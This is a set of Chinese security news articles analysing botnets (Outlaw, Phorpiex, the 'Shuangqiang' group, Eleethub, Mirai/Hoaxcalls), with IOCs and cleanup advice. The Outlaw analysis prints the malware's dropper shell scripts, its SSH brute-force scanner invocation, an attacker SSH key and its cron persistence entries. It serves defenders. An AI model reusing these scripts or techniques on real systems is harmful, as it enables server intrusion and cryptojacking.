亡命徒(Outlaw)僵尸网络感染约2万台Linux服务器,腾讯安全提醒企业及时清除
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/4_E6kPuodxb3_inVCq2fqg 一、背景 腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸网络攻击。亡命徒(Outlaw)僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示,亡命徒(Outlaw)僵尸网络已造成国内约2万台Linux服务器感染,影响上万家企业。 此次攻击传播的母体文件为dota3.tar.gz,可能为亡命徒(Outlaw)僵尸网络的第3个版本,母体文件释放shell脚本启动对应二进制程序,kswapd0负责进行门罗币挖矿,tsm32、tsm64负责继续SSH爆破攻击传播病毒。 亡命徒(Outlaw)僵尸网络之前通过利用Shellshock漏洞进行分发,因此被命名为“ Shellbot”。Shellbot利用物联网(IoT)设备和Linux服务器上的常见命令注入漏洞进行感染。Shellshock漏洞(CVE-2014-7169)是2014年在Bash command shell中发现的一个严重的漏洞,大多数Linux发行版通常会使用到该功能,攻击者可以在这些受影响的Linux服务器上远程执行代码。 亡命徒(Outlaw)僵尸网络利用SSH爆破入侵的攻击活动,可以被腾讯T-Sec高级威胁检测系统(御界)检测到: 腾讯T-Sec云防火墙可以检测亡命徒(Outlaw)僵尸网络的挖矿行为、Shellshock漏洞利用及暴力破解SSH登录口令等等攻击活动。 目前,Outlaw僵尸网络的影响仍在扩散,对企业服务器危害严重,腾讯安全系列产品已采取应急响应措施,执行清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)亡命徒(Outlaw)僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)亡命徒(Outlaw)僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)亡命徒(Outlaw)僵尸网络相关联的IOCs已支持识别检测; 2)云防火墙已支持对亡命徒(Outlaw)僵尸网络所采用挖矿协议的检测拦截、Shellshock漏洞利用检测以及采取SSH暴力破解的检测。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持检测云主机是否存在SSH弱口令,检测外部针对云主机的SSH弱口令爆破行为; 2)已支持查杀亡命徒(Outlaw)僵尸网络相关的挖矿木马、后门程序。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯漏洞扫描服务已支持监测全网资产是否存在SSH弱口令。 2)腾讯漏洞扫描服务已支持检测全网资产是否受Shellshock漏洞CVE-2014-7169(UCS Manager相关)影响。 关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)御界已支持通过协议特征检测亡命徒(Outlaw)僵尸网络的挖矿行为; 2)御界已支持检测SSH弱口令爆破攻击行为; 3)腾讯御界已支持检测Shellshock漏洞CVE-2014-7169、CVE-2014-6271。 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀亡命徒(Outlaw)僵尸网络释放的后门木马、挖矿木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 Outlaw通过SSH爆破攻击,访问目标系统并下载带有shell脚本、挖矿木马、后门木马的TAR压缩包文件dota3.tar.gz。解压后的文件目录可以看到,根目录rsync下存放初始化脚本,a目录下存放shellbot后门,b目录下存放挖矿木马,c目录下存放SSH爆破攻击程序。 C目录下二进制文件tsm32、tsm64为SSH(22端口)扫描和爆破程序,并可以通过执行远程命名来下载和执行恶意程序。 爆破成功后执行base64编码的shell命令,主要功能为删除旧版本的恶意程序和目录,然后解压获取到的最新版本恶意程序并执行,内容如下: 命令1: #!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix rm -rf .X2* mkdir .X25-unix cd .X25-unix mv ar/tmp/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd .rsync; cat /tmp/.X25-unix/.rsync/initall | bash 2>1& sleep 45s && pkill -9 run && pkill -9 go && pkill -9 tsm exit 0 命令2: #!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix rm -rf .X2* mkdir .X25-unix cd .X25-unix mv ar/tmp/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd /tmp/.X25-unix/.rsync/c nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1& sleep 8m && nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1& sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1& exit 0 还会通过远程命令修改SSH公钥为: AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== 以便之后能更容易入侵。 B目录下run脚本主要内容为base64编码的shellbot后门程序,解码后可以看到代码仍然经过混淆。 把执行函数eval改为print可打印出解密后的代码,是基于Perl的Shellbot变种,连接C2服务器地址为45.9.148.99:443,能够执行多个后门命令,包括文件下载、执行shell cmd和DDoS攻击。如果接受到扫描端口命令,可针对以下端口进行扫描:”21″,”22″,”23″,”25″,”53″,”80″,”110″,”143″,”6665″。 A目录下二进制文件kswapd0为XMRig编译的Linux平台门罗币挖矿木马。 在初始化阶段会执行脚本init0来找到大量Linux平台竞品挖矿木马并进行清除。 在当前用户目录下创建/.configrc目录,拷贝a、b文件夹到该目录下并执行初始化脚本,然后通过写入cron.d安装计划任务进行持久化。写入定时任务如下: 1 1 */2 * * $dir2/a/upd>/dev/null 2>&1 @reboot $dir2/a/upd>/dev/null 2>&1 5 8 * * 0 $dir2/b/sync>/dev/null 2>&1 @reboot $dir2/b/sync>/dev/null 2>&1 0 0 */3 * * $dir/c/aptitude>/dev/null 2>&1 三、安全建议 建议企业Linux服务器管理员检查服务器资源占用情况,及时修改弱密码,避免被暴力破解。若发现服务器已被入侵安装挖矿木马,可参考以下步骤手动检查、清除: 1、 删除以下文件,杀死对应进程: /tmp/*-unix/.rsync/a/kswapd0 */.configrc/a/kswapd0 md5: 84945e9ea1950be3e870b798bd7c7559 /tmp/*-unix/.rsync/c/tsm64 md5: 4adb78770e06f8b257f77f555bf28065 /tmp/*-unix/.rsync/c/tsm32 md5: 10ea65f54f719bffcc0ae2cde450cb7a 2、 检查cron.d中是否存在包含以下内容的定时任务,如有进行删除: /a/upd /b/sync /c/aptitude IOCs IP 45.9.148.99 45.55.57.6 188.166.58.29 104.236.228.46 165.227.45.249 192.241.211.94 188.166.6.130 142.93.34.237 46.101.33.198 149.202.162.73 167.71.155.236 157.245.83.8 45.55.129.23 46.101.113.206 37.139.0.226 159.203.69.48 104.131.189.116 159.203.102.122 159.203.17.176 91.121.51.120 128.199.178.188 208.68.39.124 45.55.210.248 206.81.10.104 5.230.65.21 138.197.230.249 107.170.204.148 Md5 dota3.tar.gz 1a4592f48f8d1bf77895862e877181e0 kswapd0 84945e9ea1950be3e870b798bd7c7559 tsm64 4adb78770e06f8b257f77f555bf28065 tsm32 10ea65f54f719bffcc0ae2cde450cb7a run 716e6b533f836cee5e480a413a84645a URL http[:]//45.55.57.6/dota3.tar.gz http[:]//188.166.58.29/dota3.tar.gz http[:]//104.236.228.46/dota3.tar.gz http[:]//165.227.45.249/dota3.tar.gz http[:]//192.241.211.94/dota3.tar.gz http[:]//188.166.6.130/dota3.tar.gz http[:]//142.93.34.237/dota3.tar.gz http[:]//46.101.33.198/dota3.tar.gz http[:]//149.202.162.73/dota3.tar.gz http[:]//167.71.155.236/dota3.tar.gz http[:]//157.245.83.8/dota3.tar.gz http[:]//45.55.129.23/dota3.tar.gz http[:]//46.101.113.206/dota3.tar.gz http[:]//37.139.0.226/dota3.tar.gz http[:]//159.203.69.48/dota3.tar.gz http[:]//104.131.189.116/dota3.tar.gz http[:]//159.203.102.122/dota3.tar.gz http[:]//159.203.17.176/dota3.tar.gz http[:]//91.121.51.120/dota3.tar.gz http[:]//128.199.178.188/dota3.tar.gz http[:]//208.68.39.124/dota3.tar.gz http[:]//45.55.210.248/dota3.tar.gz http[:]//206.81.10.104/dota3.tar.gz http[:]//5.230.65.21/dota3.tar.gz http[:]//138.197.230.249/dota3.tar.gz http[:]//107.170.204.148/dota3.tar.gz
Phorpiex 僵尸网络病毒新增感染可执行文件
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/sRE5CyyEutzs_Z9BDdyGnA 一、概述 腾讯安全团队检测到Phorpiex僵尸网络病毒在国内近期较为活跃,该病毒的新版本增加了对感染32位PE文件(一种可执行文件)的能力,被感染的可执行文件被添加.zero恶意后门节代码,同时该病毒移除了检测虚拟机环境的相关代码。当已被感染的32位PE文件(通常是EXE可执行程序文件)在正常无毒的电脑中运行时,将会下载执行Phorpiex病毒主模块,实现病毒在不同电脑之间的感染传播。腾讯安全还检测到Avaddon勒索病毒使用Phorpiex僵尸网络的基础设施分发投递。 PE感染特性将导致Phorpiex僵尸网络病毒增加更多传播途径,如:已被感染的PE可执行文件可能通过移动设备的交换传播;带毒程序如果感染网站服务器,访客电脑可能通过网站下载被感染。 我们知道,感染型病毒曾经在WinXp之前的时代比较多见,现在已很少见,网民对这类病毒变得比较陌生,会有利于Phorpiex僵尸网络病毒通过网络或移动存储介质交换感染扩散。 Phorpiex僵尸网络传播途径较多,总结一下,主要有以下几种: 通过被感染的U盘、移动硬盘传播; 通过网站Web服务目录下被替换的文件下载传播; 通过被感染的压缩包文件传播; 通过VNC爆破传播; 通过感染32位PE可执行程序文件传播(新增) Phorpiex僵尸网络病毒主要通过投递、分发其它恶意病毒木马来获利。包括:挖矿木马、盗窃虚拟币的木马、群发诈骗邮件敲诈虚拟币、为其他勒索病毒提供分发渠道等等。腾讯T-Sec终端管理系统(御点)及腾讯电脑管家均可查杀Phorpiex僵尸网络病毒。 二、样本分析 被感染文件: 观察被感染后的文件可知新增了.zero节数据,运行被感染的可执行文件将会首先执行新增的恶意代码部分,再跳转到OEP处执行程序的原始功能,从而实现新的感染。 新增节内感染代码首先判断%appdata%\winsvcs.txt文件是否存在,文件属性是否隐藏。winsvcs.txt名的隐藏文件为Phorpiex病毒攻击成功后的标记文件,病毒通过检测该文件的属性来避免对已中毒主机的反复感染。 当感染代码判断该主机未被感染过,则从C2地址:88.218.16.27处拉取pe.exe模块到tmp目录执行,该文件后分析为Phorpiex病毒主文件。 拉取执行PE.exe病毒主文件完毕后,感染代码最终通过 PEB->ldr->InLoadOrderModuleList获取到当前模块基址后计算出原始未感染前入口代码地址跳转执行,以确保感染病毒后的可执行程序能正常运行。 Phorpiex僵尸网络主病毒文件: 88.218.16.27处拉取的pe.exe模块同样为加壳程序文件,内存Dump后可知,该模块为Phorpiex僵尸网络主传播模块。 该版本的Phorpiex主模块相比较老版本,在入口处的环境检测中相关代码中,将反虚拟机功能取消,只保留了反调试功能,这也意味着虚拟机环境下Phorpiex病毒也会从C2服务器下载恶意代码运行。 该版本的Phorpiex除作为downloader推广其它恶意程序外,自身主要创建4个功能线程: 线程1(老功能) 线程2(老功能) 线程3:(老功能) 线程4(新增) 感染文件过程过程是在%systemdrive%系统盘内展开的 感染目标为后缀.exe的PE类型文件,同时如果系统目录内文件绝对路径包含以下关键字符,不对其进行感染。以免感染到系统文件导致程序运行出错,从而避免被用户过早发现。 病毒感染时会排除含以下关键词的目录:windows,sys,$recycle.,service,intel,micro,boot,driver,recovery,update,drv。 文件名感染排除关键词:.exe.,win,sys,drv,driver,$,drivemgr.exe等。 感染过程采取文件映射方式,根据其感染代码可知,病毒对PE-64进行了排除,只感染32位文件。虽然如此,但由于当前Windows平台下多数软件为了兼容性未提供x64版本,故病毒依旧能够感染到大量的文件。病毒感染完成后会将内置的zero_code代码作为附加节数据添加到被感染文件中,zero_code中硬编码了一个0xCCCCCCCC常量,该常量在zero_code节代码拷贝完成后进行动态查找然后修改为原始程序OEP。 Avaddon勒索病毒与Phorpiex僵尸网络的关联 腾讯安全还捕获到通过邮件附件传播的伪装成图片的恶意样本。 附件包内图片扩展名的隐藏文件,实际为js脚本文件,只需要在文件夹选项中打开查看已知文件的扩展名。 脚本文件将会使用Poweshell或者Bitadmin尝试从217.8.117.63地址下载名为jpr.exe的文件执行,该投递方式疑为Phorpiex僵尸网络的手法。 通过腾讯安图大数据威胁情报管理可知,IP:217.8.117.63,确实为Phorpiex僵尸网络基础设施。 下载的jpr.exe经鉴定为新型Avaddon勒索病毒。 IOCs MD5: e28c6a5e9f89694a0237fe4966a6c32c 04deb3031bd87b24d32584f73775a0a8 4c7b7ce130e2daee190fc88de954292d c9ec0d9ff44f445ce5614cc87398b38d IP: 88.218.16.27 217.8.117.63 Domain: tldrbox.top tldrbox.ws URL: hxxp://88.218.16.27/1 hxxp://88.218.16.27/2 hxxp://88.218.16.27/3 hxxp://88.218.16.27/4 hxxp://88.218.16.27/5 hxxp://88.218.16.27/v hxxp://tldrbox.top/1 hxxp://tldrbox.top/2 hxxp://tldrbox.top/3 hxxp://tldrbox.top/4 hxxp://tldrbox.top/5 hxxp://tldrbox.top/v hxxp://tldrbox.ws/1 hxxp://tldrbox.ws/2 hxxp://tldrbox.ws/3 hxxp://tldrbox.ws/4 hxxp://tldrbox.ws/5 hxxp://tldrbox.ws/v hxxp://217.8.117.63/jpr.exe 参考链接 https://mp.weixin.qq.com/s/zbqLmCBblvbZQwsM2XJd2Q https://mp.weixin.qq.com/s/3kyLkoBd9K-5_VSk5Nnb6A
报告显示僵尸网络会利用百度贴吧等常用服务进行管理
有关研究报告显示,双枪恶意程序的僵尸网络利用国内的常用服务进行管理。该僵尸网络的数量超过了 10 万。研究人员观察到双枪恶意程序使用百度贴吧图片来分发配置文件和恶意软件,使用了阿里云存储来托管配置文件,利用百度统计管理感染主机的活跃情况,恶意程序样本中还多次发现了腾讯微云的 URL 地址。 它第一次将 BAT 三大厂商的服务集成到了自己的程序中。百度已经采取行动阻断恶意代码下载链接,以下为报告全文。 概述 近日,我们的域名异常监测系统 DNSMon 捕捉到域名 pro.csocools.com 的异常活动。根据数据覆盖度估算,感染规模超过100k。我们通过告警域名关联到一批样本和 C2,分析样本后发现是与双枪恶意程序相关的团伙开始新的大规模活动。近年来双枪团伙屡次被安全厂商曝光和打击,但每次都能死灰复燃高调复出,可见其下发渠道非常庞大。本次依然是因为受感染主机数量巨大,导致互联网监测数据异常,触发了netlab的预警系统。本报告中我们通过梳理和这些URL相关的C2发现了一些模式,做了一些推测。 我们观察到恶意软件除了使用百度贴吧图片来分发配置文件和恶意软件,还使用了阿里云存储来托管配置文件。为了提高灵活性和稳定性,加大阻拦难度,开发者还利用百度统计这种常见的网络服务来管理感染主机的活跃情况。同时我们在样本中多次发现了腾讯微云的URL地址,有意思的是我们在代码中并没有找到引用这些地址的代码。至此,双枪团伙第一次将BAT三大厂商的服务集成到了自己的程序中,可以预见使用开放服务来管理僵尸网络或将成为流行趋势。有必要澄清的是,这些公开服务本身均为技术中立,此恶意代码中滥用这些公开服务完全是其作者的蓄意行为,各主要互联网公司均在用户许可中明确反对并采取措施抵御这些恶意滥用行为。 5月14日起,我们联系到了百度安全团队,采取了联合行动,对该恶意代码的传播范围做了度量,并采取了抵御措施。截止本文发稿,相关的恶意代码下载链接已经被阻断。百度安全团队对该事件的声明见文末。 IOC关联分析 从告警域名入手,通过DNS解析记录和样本流量分析建立IOC关联,过滤掉孤立和噪音节点,我们找到了一组与此次传播活动有关的关键C2。从下面截取的部分IOC关联图可以看出,几乎所有的域名都和两个关键的ip 地址 125.124.255.20 和 125.124.255.79 有关,围绕这两个ip地址,双枪团伙从19年下半年开始依次启用了一批域名来控制和下发恶意程序。事实上这个团伙长期且稳定的控制了大量 125.124.255.0/24 网段的ip地址,可以看出他们拥有非常丰富的网络资源。 通过样本溯源可以看到,这次大规模感染主要是通过诱导用户安装包含恶意代码的网游私服客户端,具体感染方式大体分为两种,下面进行深入分析。 感染方式1 — 启动器内包含恶意代码 阶段1 — 下载并加载cs.dll恶意文件 各类私服入口 点击下载链接跳到私服主页 登录器下载 “蟠龙军衔.zip” 含恶意代码的私服客户端启动器被用户下载并执行,恶意代码访问配置信息服务器,然后根据配置信息从百度贴吧下载并动态加载名为 cs.dll 的最新版本恶意程序。cs.dll 中的敏感字串使用了一种变形的 DES 加密方法,这种加密算法和我们之前捕捉到的双枪样本高度相似。我们从样本主体 exe 文件入手,逐步分析上述恶意行为。 文件结构 “蟠龙军衔.exe” PE Resource 中包含 7 个文件,Widget.dll 是客户端组件,资源文件中的cs.dll 是旧版的恶意程序。4 个 .sys 文件是私服客户端的驱动程序,虽然命名为Game Protect,但我们在代码中发现了劫持流量插入广告的代码。 下载配置信息 启动器创建线程访问加密配置文件 http://mtdlq.oss-cn-beijing.aliyuncs.com/cscsmt.txt 页面包含 8 行 16 进制字串,与密钥 B2 09 BB 55 93 6D 44 47 循环异或即可解密。 解密后是 8 个百度贴吧图片的地址。 下载图片文件切割并重组 cs.dll 文件 直接访问图片地址,图片文内容看起来像是随机生成的。 恶意程序会下载图片文件,每张图片使用 ><>>>< 为标记来分隔图像数据和恶意代码数据。 把所有恶意代码拼接起来我们得到了阶段 2 的恶意程序 cs.dll。 恶意程序通过内存映射的方式加载上述 cs.dll,然后调用导出函数 abcd() 进入阶段 2 ,所以并没有文件落地。 阶段2 — 上报主机信息,释放并加载恶意驱动 cs.dll 会进行一些简单的虚拟机和杀软对抗,利用百度统计服务上报 Bot 信息,释放第 3 阶段 VMP 加壳的驱动程序(包含x86/x64两个版本)。 DES 解密算法 样本中的 DES 解密算法为恶意软件作者自定义实现,加密模式为 CBC,无填充。DES 加密算法的转换表与旧版(“双枪”木马的基础设施更新及相应传播方式的分析)相同 。本次恶意活动涉及的 DES 解密,都涉及 2 层解密,第一层解密,先以 Base64 算法解码字符串 dBvvIEmQW2s= 得到一份二进制数据,再以空密钥 \x00\x00\x00\x00\x00\x00\x00\x00 对上述二进制数据解密,得出字串 helloya\x00,再以此字串作为密钥,用自研 DES 算法解密其他大量密文数据。完整的解密过程如下: 检查虚拟主机环境 VM 和 WM 通过检查注测表项判断是否是 VMWare 主机,如果是 VM 主机代码则直接返回。 创建 Bot ID 使用系统 API 创建主机的 Bot ID,写入注册表 SOFTWARE\\PCID, 利用百度统计服务管理 Bot 恶意软件的开发者借用了百度统计接口的一些标准字段来上报主机敏感信息,利用百度统计这种常见的网络行为来管理感染主机的活跃情况。因为百度统计服务被大量网站使用,从流量上看是一套合规的浏览器网络行为,所以很难将其区分出来,加大了安全厂商打击的难度。 恶意程序首先使用一个名为 DataWork() 的函数伪造浏览器请求,下载 hm.js 脚本。 保存返回信息中的用户 Cookie 信息 HMACCOUNT 到注册表。 通过 http://hm.baidu.com/hm.gif? 接口,恶意程序将提取到的统计脚本的版本信息this.b.v、用户 Cookie 信息、bot_id 和伪造的其它统计信息组包上报,恶意软件开发者使用百度统计的后台可以方便的管理和评估感染用户。 从 Dat 资源解密,创建,安装驱动 检查是否安装了 XxGamesFilter 等私服客户端驱动。 根据安装情况和操作系统版本选择不同的资源 ID,每一个资源对应不同版本的驱动(32 位系统使用 ID 为 111 或 109 资源,64 位系统使用 ID 为 110 或 112 的资源)。 资源是简单加密过的,以解密 32 位驱动为例,首先倒转数据顺序,然后逐字节和系统版本数值 32 异或,得到一个 VMP 加壳的驱动文件。 测是否存在 TeSafe 驱动,如果存在刚中断感染流程。计算 TeSafe+{Computer Name} 的 MD5 值,检测是否存在名为该 MD5 字串的驱动,如果存在说明系统已经被感染过,也会中断感染流程。 //拼接字串 +00 54 65 53 61 66 65 2B 57 49 4E 2D 52 48 39 34 50 TeSafe+WIN-RH94P +10 42 46 43 37 34 41 00 00 00 00 00 00 00 00 00 00 BFC74A.......... //拼接字串的MD5值 +00 46 34 36 45 41 30 37 45 37 39 30 33 33 36 32 30 F46EA07E79033620 +10 43 45 31 33 44 33 35 44 45 31 39 41 41 43 34 32 CE13D35DE19AAC42 如果系统 EnableCertPaddingCheck 注册表项关闭,则替换文件末尾 16 字节为随机数据。这样每个感染主机上的样本 HASH 值完全不一样,可以对抗基于 HASH 查杀的方案。 将驱动程序释放到 TEMP 目录下,文件名为长度为 7 的随机字符串。例如:"C:\Users\{User Name}\AppData\Local\Temp\iiitubl" 注册驱动文件启动服务并检测安装是否成功。 阶段3 — 劫持系统进程,下载后续恶意程序 驱动运行后会拷贝自己到 Windows/system32/driver/{7个随机字符}.sys ,伪造驱动设备信息为常见的合法驱动,如 fltMgr.sys ,向系统进程 Lassas.exe 和 svchost.exe 注入 DLL 模块。完成整个初始化过程后,就形成了一个驱动和 DLL 模块通过 DeviceIoControl() 通信合作来完成作务的工作模式,这是一个驱动级别的下载器。所有敏感的配置信息都保存在驱动内部,DLL 通过调用驱动来获得配置服务器相关信息,根据下载的配置信息去百度贴吧下载其它恶意代码,进行下一阶段的恶意活动。 驱动运行后用APC注入法向系统进程 Lassas.exe 注入 DLL 模块。 DLL 配合驱动的执行过程。 DLL 首先尝试创建互斥对象 {12F7BB4C-9886-4EC2-B831-FE762D4745DC} ,防止系统创建多个实例。 接着会检查宿住进程是否是 Lsass.exe 或 svchost.exe,确保不是运行在沙箱之类的分析环境中。 尝试创建设备 "\\.\F46EA07E79033620CE13D35DE19AAC42" 句柄,建立和驱动模块的通信。 向驱动发送 0x222084 设备控制码,获得连接服务器的配置信息。和配置服务器的通信使用 HTTPS+DES 的双重加密方式,配置信息包含三个重要的部分: 主机信息上报服务 https://cs.wconf5.com:12709/report.ashx,供 DLL 上报主机基本信息。 bot id,安装时间等基本信息。 是否安装 360 杀毒,是否是虚拟机环境。 是否是无盘工作站。 上报主机信息使用DES加密,密钥为 HQDCKEY1。 访问 https://cs.wconf5.com:12710/123.html 下载配置信息: 配置信息依然是变形 DES 加密,解密密钥为 HQDCKEY1。解密后可以看到配置信息使用自定义的格式,两个百度图片为一组,截取有效数据拼接为一个有效文件: 配置信息 https://share.weiyun.com/5dSpU6a 功能未知: 所有驱动样本返回的配置信息都包含一个腾讯微云地址,直接访问该地址可以看到若干字符和数字组成的无意义字串。我们在收集到的配置信息中发现,每组数据中的配置信息服务器和微云保存的数据存在特定的模式。以上图为例,访问腾讯微云,获取字符串 cs127,其同组数据中的配置文件服务器的子域为 cs.xxxx.com ,端口为127xx。这看起来像是一种动态生成配置文件服务器地址的策略,推测可能是还在开发阶段的功能,所以样本中并未包含对应代码。 完成上述初始化过程后,驱动开始根据配置文件进入真正的功能操作。根据解析的配置文件,dll和驱动模块配合可以完成非常复杂的功能,下面罗列其中一部分功能。 更新驱动文件 程序会使用另一套算法得到DES解密密钥 HelloKey,最后用 DES 算法解出最终数据: 劫持进程ip地址。 向系统中添加证书 下载文件到 TEMP 目录并创建进程。 篡改 DNS配置 PAC 代理劫持 感染方式2 — DLL 劫持 感染方式 2 依然是以私服客户端为载体,但是在技术细节上有较大差异。 登录器下载页面: 下载后的登录器: 多款类似游戏的私服客户端的组件 photobase.dll 被替换成同名的恶意 DLL 文件,恶意 DLL 文件的 PE Resource 中包含 3 个关键文件: 恶意 photobase.dll 有两个关键动作: 首先会释放相应架构的恶意驱动程序,然后注册系统服务并启动; 然后加载真正的 photobase.dll 文件,并将导出函数转发到真正的 photobase.dll。 后续感染流程同上。 这是一套标准的 DLL 劫持加载方式。 阶段1 — 释放并加载恶意驱动 恶意 photobase.dll 文件会首先为即将释放的恶意驱动文件生成一个随机文件名,文件名为 10 个随机字符,文件后缀为 .dat,并把自身 PE Resource 中相应的驱动文件放到 %windir%\Temp\ 目录下。 然后为落地的恶意驱动文件注册系统服务,并启动服务: 恶意驱动接下来的活动与前面第一种感染方式雷同,即下载、解密并最终加载其他恶意文件。 阶段2 — 加载真 photobase.dll 在恶意 photobase.dll PE Resource 中的真 photobase.dll 文件的前 2 个字节被置空: 恶意 photobase.dll 从 PE Resource 中提取这份文件的时候,会把这前 2 个字节以 MZ(PE 文件头) 填充: 然后,恶意的 photobase.dll 文件会为刚载入的真正的 photobase.dll 文件载入动态链接库、导入相关函数,最后,把真 photobase.dll 中的导出函数转发到自己的导出函数中。部分转发的导出函数如下: 以上面高亮的导出函数 Sqm::AddToStream() 为例,恶意 photobase.dll 中的转发实现如下: 相关安全团队声明 基于海量威胁情报,百度安全反黑产开放平台配合测算出僵尸网络的规模。平台同时启动相关措施,尝试对受僵尸网络控制的用户进行风险提示。在本次联合行动中,通过黑产威胁情报分析、共享、应对等举措,我们对于双枪团伙的作案技术手段、逻辑及规则形成进一步认知。 相关附录:https://www.cnbeta.com/articles/tech/983871.htm (稿源:solidot,封面源自网络。)
Eleethub:使用 Rootkit 进行自我隐藏的加密货币挖矿僵尸网络
Unit 42研究人员发现了一个新的使用Perl Shellbot的僵尸网络活动,旨在挖掘比特币,同时使用专门制作的rootkit以避免检测。 该僵尸网络传播的方式是将一个恶意的shell脚本发送到一个受攻击的设备,然后该设备下载其他脚本。在受害者设备执行下载的脚本之后,它开始等待来自其命令和控制(C2)服务器的命令。尽管Perl编程语言因其广泛的兼容性而在恶意软件中流行,但这种僵尸网络不仅可能影响基于unix的系统,还可能影响使用Linux子系统的Windows 10系统。 本次发现的新活动使用了一个名为libprocesshider.so的共享库来隐藏挖掘过程,并且用一个专门制作的rootkit来避免检测。该恶意活动幕后者使用“Los Zetas”这个名字,暗指一个墨西哥犯罪组织,该组织被认为是该国最危险的贩毒集团之一。尽管如此,他们实际上不太可能是这个犯罪组织的一部分。此外,这个僵尸网络还连接到最大的IRC(Internet中继聊天)网络之一的UnderNet,讨论了包括恶意软件和网络犯罪在内的各种主题。 而且,僵尸网络在被发现时仍在开发中。但是,重要的是在攻击者危害更多设备之前阻止它。我们观察到,僵尸网络越来越多地使用xmrig和emech等已知的挖掘工具,在受害设备上挖掘比特币。这些工具已经在最近的挖矿活动中被检测到,例如VictoryGate和Monero mining开采了超过6000美元的利润。我们估计,如果Eleethub僵尸网络在一到两年的时间内扩张,它也可以赚取数千美元。 …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1214/ 消息来源:PaloAltoNetworks, 译者:吴烦恼。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接
Mirai 和 Hoaxcalls 僵尸网络瞄准旧版赛门铁克 Web 网关
作为Unit 42主动监控野外传播威胁工作的一部分,我最近发现了新的Hoaxcalls和Mirai僵尸网络活动,是针对赛门铁克安全Web网关5.0.2.8中的身份验证后的远程执行代码漏洞。该产品已逐渐淘汰,于2015年到期,产品支持于2019年到期。目前还没证据表明其他版本的固件易受攻击,我已与赛门铁克共享这些发现。他们证实赛门铁克Web网关5.2.8中已不再存在当前被利用的漏洞,他们还想强调一点,此漏洞不会影响安全的Web网关解决方案,包括代理程序和Web安全服务。 2020年4月24日,第一个利用该漏洞的攻击实例浮出水面,这是同月早些时候首次发现的僵尸网络演化的一部分。这个最新版本的Hoaxcalls支持其它命令,这些命令允许攻击者对受感染的设备进行更大的控制,比如代理通信、下载更新、保持跨设备重启的持久性或防止重启,以及可以发起更多的DDoS攻击。在漏洞细节公布的几天后,就开始在野外使用该漏洞利用程序,这说明了一个事实,这个僵尸网络的作者一直在积极测试新漏洞的有效性。 此后,在5月的第一周,我还发现了一个Mirai变体活动,其中涉及使用相同的漏洞利用,尽管在该活动中,样本本身不包含任何DDoS功能。相反,它们的目的是使用证书暴力进行传播以及利用赛门铁克Web网关RCE漏洞。本文讲述有关这两个活动值得注意的技术细节。 …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1211/ 